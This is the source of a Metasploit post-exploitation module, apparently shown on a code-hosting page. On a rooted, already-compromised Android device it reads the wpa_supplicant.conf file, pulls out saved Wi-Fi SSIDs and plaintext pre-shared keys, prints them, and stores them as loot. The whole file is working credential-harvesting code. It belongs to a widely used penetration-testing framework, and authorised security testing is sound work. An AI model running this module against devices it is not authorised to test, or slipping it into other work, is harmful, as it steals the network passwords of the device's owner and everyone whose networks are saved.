CoCalc -- wireless

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/android/gather/wireless_ap.rb
¹⁹⁸¹³ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7

8
  include Msf::Post::Common
9
  include Msf::Post::File
10
  include Msf::Post::Android::Priv
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Gather Wireless SSIDs and PSKs',
17
        'Description' => %q{
18
          This module displays all wireless AP creds saved on the target device.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => ['Auxilus', 'timwr'],
22
        'SessionTypes' => [ 'meterpreter', 'shell' ],
23
        'Platform' => 'android',
24
        'Notes' => {
25
          'Stability' => [CRASH_SAFE],
26
          'SideEffects' => [],
27
          'Reliability' => []
28
        }
29
      )
30
    )
31
  end
32

33
  def run
34
    fail_with(Failure::NoAccess, 'This module requires root permissions.') unless is_root?
35

36
    data = read_file('/data/misc/wifi/wpa_supplicant.conf')
37
    aps = parse_wpa_supplicant(data)
38

39
    if aps.empty?
40
      print_error('No wireless APs found on the device')
41
      return
42
    end
43

44
    ap_tbl = Rex::Text::Table.new(
45
      'Header' => 'Wireless APs',
46
      'Indent' => 1,
47
      'Columns' => ['SSID', 'net_type', 'password']
48
    )
49

50
    aps.each do |ap|
51
      ap_tbl << [
52
        ap[0],  # SSID
53
        ap[1],  # TYPE
54
        ap[2]   # PASSWORD
55
      ]
56
    end
57

58
    print_line(ap_tbl.to_s)
59
    p = store_loot(
60
      'wireless.ap.creds',
61
      'text/csv',
62
      session,
63
      ap_tbl.to_csv,
64
      File.basename('wireless_ap_credentials.txt')
65
    )
66
    print_good("Secrets stored in: #{p}")
67
  end
68

69
  def parse_wpa_supplicant(data)
70
    aps = []
71
    networks = data.scan(/^network={$(.*?)^}$/m)
72
    networks.each do |block|
73
      aps << parse_network_block(block[0])
74
    end
75
    aps
76
  end
77

78
  def parse_network_block(block)
79
    ssid = parse_option(block, 'ssid')
80
    type = parse_option(block, 'key_mgmt', strip_quotes: false)
81
    psk = parse_option(block, 'psk')
82
    [ssid, type, psk]
83
  end
84

85
  def parse_option(block, token, strip_quotes: true)
86
    if strip_quotes && ((result = block.match(/^\s#{token}="(.+)"$/)))
87
      return result.captures[0]
88
    elsif (result = block.match(/^\s#{token}=(.+)$/))
89
      return result.captures[0]
90
    end
91
  end
92
end
93

94
Product

Resources

Company
